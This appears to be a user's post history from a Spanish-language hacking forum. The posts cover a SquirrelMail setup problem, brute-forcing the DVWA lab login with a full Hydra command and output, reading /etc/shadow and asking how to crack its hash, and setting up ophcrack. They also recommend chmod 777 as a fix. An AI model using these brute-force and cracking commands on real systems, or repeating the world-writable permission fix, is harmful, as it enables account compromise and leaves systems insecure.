Mensajes

ya lo solucione me ayudo un we lordblacksuca
nomas se le dan permisos chmod 777
pal que quiera solucionar como yo xD

bueno no se si va en linux XD!
pero estoy instalando un servidor squirrelmail basandome en este tutorial:
http://www.unixmen.com/install-squirrel-mail-on-ubuntu-server/
estoy usando ubuntu 12.04 y lampp como servidor
en el caso de hacer el linkeo pongo asi:
ln -s /usr/share/squirrelmail/ /opt/lampp/htdocs
por que es mi ruta
ahora cuando voy a checar la configuracion me sale lo siguiente:

Código [Seleccionar] Expandir

SquirrelMail configtest

This script will try to check some aspects of your SquirrelMail configuration and point you to errors whereever it can find them. You need to go run conf.pl in the config/ directory first before you run this script.

SquirrelMail version: 1.4.22
Config file version: 1.4.0
Config file last modified: 05 September 2012 04:04:28
Checking PHP configuration...
   PHP version 5.3.8 OK.
   Running as nobody(65534) / nogroup(65534)
   display_errors: 1
   error_reporting: 32767
   variables_order OK: GPCS.
   PHP extensions OK. Dynamic loading is disabled.
Checking paths...

   ERROR: I cannot write to data dir (/var/lib/squirrelmail/data/)!

me podrian decir que podria hacer para arreglar el problema?
bueno se los agradeceria saludos

Je! bueno me canse de usar hydra y no dar con la respuesta y me puse a usar burp suite con la que me dio la respuesta 
miren:



Ahi te das cuenta cual es la pass por que tiene un peso diferente y si te vas a la respuesta ahi me dice que me he logeado yeah! bueno ya lo pondre como solucionado xD

hydra como saben todos es un cracker por wordlist de muchos protocolos en este caso estoy utilizando un protocolo http-get-form

lo que pasa es lo siguiente hago una sintaxis asi:

Código [Seleccionar] Expandir

hydra -vV -L lista.txt -P lista.txt -f -o found  127.0.0.1 http-get-form "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect"


con esto me devolveria en modo detallado el user y pass que se encuentran en wordlist lista.txt me dara la salida del archivo found el host es 127.0.0.1 http-get-form (el modulo) "dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Incorrect" <<<--- esta es una regla que puedes ir creando segun la explicacion de hydra en.... hydra -U http-get-form

le puse username , password  y login ... ya que son los que vienen en el formulario real de la web en este caso es una aplicacion vulnerable dvwa

entonces me un restultado asi...

Código [Seleccionar] Expandir

Hydra v7.1 (c)2011 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-08-13 02:30:54
[DATA] 16 tasks, 1 server, 49 login tries (l:7/p:7), ~3 tries per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "admin" - 1 of 49 [child 0]
[80][www-form] host: 127.0.0.1   login: admin   password: user
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "user" - 2 of 49 [child 1]
[80][www-form] host: 127.0.0.1   login: admin   password: admin
[80][www-form] host: 127.0.0.1   login: admin   password: xd
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd" - 3 of 49 [child 2]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "password" - 4 of 49 [child 3]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "chulo" - 5 of 49 [child 4]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "preciosa" - 6 of 49 [child 5]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "xd5" - 7 of 49 [child 6]
[80][www-form] host: 127.0.0.1   login: admin   password: password
[ATTEMPT] target 127.0.0.1 - login "user" - pass "admin" - 8 of 49 [child 7]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "user" - 9 of 49 [child 8]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd" - 10 of 49 [child 9]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "password" - 11 of 49 [child 10]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "chulo" - 12 of 49 [child 11]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "preciosa" - 13 of 49 [child 12]
[ATTEMPT] target 127.0.0.1 - login "user" - pass "xd5" - 14 of 49 [child 13]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "admin" - 15 of 49 [child 14]
[ATTEMPT] target 127.0.0.1 - login "xd" - pass "user" - 16 of 49 [child 15]
[80][www-form] host: 127.0.0.1   login: admin   password: preciosa
[80][www-form] host: 127.0.0.1   login: admin   password: xd5
[80][www-form] host: 127.0.0.1   login: user   password: xd
[80][www-form] host: 127.0.0.1   login: user   password: admin
[80][www-form] host: 127.0.0.1   login: user   password: user
[80][www-form] host: 127.0.0.1   login: user   password: chulo
[80][www-form] host: 127.0.0.1   login: user   password: password
[80][www-form] host: 127.0.0.1   login: xd   password: admin
[80][www-form] host: 127.0.0.1   login: user   password: preciosa
[80][www-form] host: 127.0.0.1   login: user   password: xd5
[80][www-form] host: 127.0.0.1   login: xd   password: user
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-08-13 02:30:54


es decir yo se que el user es : admin  y la pass es : password

pero quiero saber por que si dice: 1 of 1 target successfuly completed, 1 valid password found
por que no me muestra solo el que es y no todos....

intente quitandole el modo detallado -vV o -v y nada sigue pasando lo mismo

alguien me podria decir que pasa que puedo hacer?  para que solo salga la password y usuario correctos y no todas la de la lista

Ya lo solucione por si alguien quiere saber ps era la cuenta la que me rechazaba el tunnel lo estaba haciendo bien ps me cree otra cuenta en shellmix y me conecte y listo xD saludos

Bueno bueno he estado probando le doy un chingo de gracias a [Q]3rV[0] (un usuario de un foro no se si este registrado aqui en elhacker xD ) que es el que me ha estado ayudando con esto en el irc de #backtrackfire, ahora lo que quiero hacer es conectarme a la shell de ssh pero lo que pasa es que la priemra ves hice la prueba sin tunel osea solo para conectarme ssh y me mando un mensaje de una clave RSA(creo) y le dije que si, bueno la segunda ves quise hacer un tunel para ello le di en source port: 8081 y Destination: localhost:8081 Auto ,Dynamic le doy add y cuando pongo en el navegador localhost 8081 lo configuro asi he intententado con diferentes puertos y nada tengo habilitado DMZ en el router no se que pasa :/ hasta desabilite el firewall de nod32 y el antivirus pero nada alguien me puede ayudar XD

Saludos espero me lean que esta largo el mensaje xD :B

Muchas gracias todos gracias por contestar me quedo realmente claro pongo el tema como solucionado 

Bueno miren es que ando viendo linux je! y me tope que puedes ver las contraseñas de los usuarios en linux pero estan encriptadas....

para verlas puse en la consola:

more /etc/shadow

digamos que me sale lo sig:

prueba:$6$sGrmkVZ2$K0/kBysB./eoxMm1eEagJHH4Sl650//jUKH3I7m93bT9nGgABUD15XLsnokQg
YJTTULoj3H8z2CP7i5KEDmfs1:15537:0:99999:7:::

ahora quiesiera saber que tipo de encriptacion es? o si se puede descifrar? si es segura? cosillas asi xD

Muchas gracias de antemano espeo tenga respuestas en este hilo

nadie me puede ayudar ? porfavor!! 

Bueno miren lo que pasa es que queria probar el ophcrack en backtrack 5 r2 desde la virtual, ahora comparto el disco duro C:\ aqui les dejo una imagen:



Ahora ya con eso me tendria que salir la carpeta en backtrack? como la puedo montar? me podrian ayudar con eso es que la verdad no tengo idea cualquier ayuda es bienvenida aunque sea lo que sea, gracias desde ya a todos